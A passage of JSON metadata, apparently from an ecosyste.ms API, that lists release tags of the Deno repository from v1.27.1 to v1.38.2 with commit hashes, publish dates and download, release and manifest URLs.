rl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.eco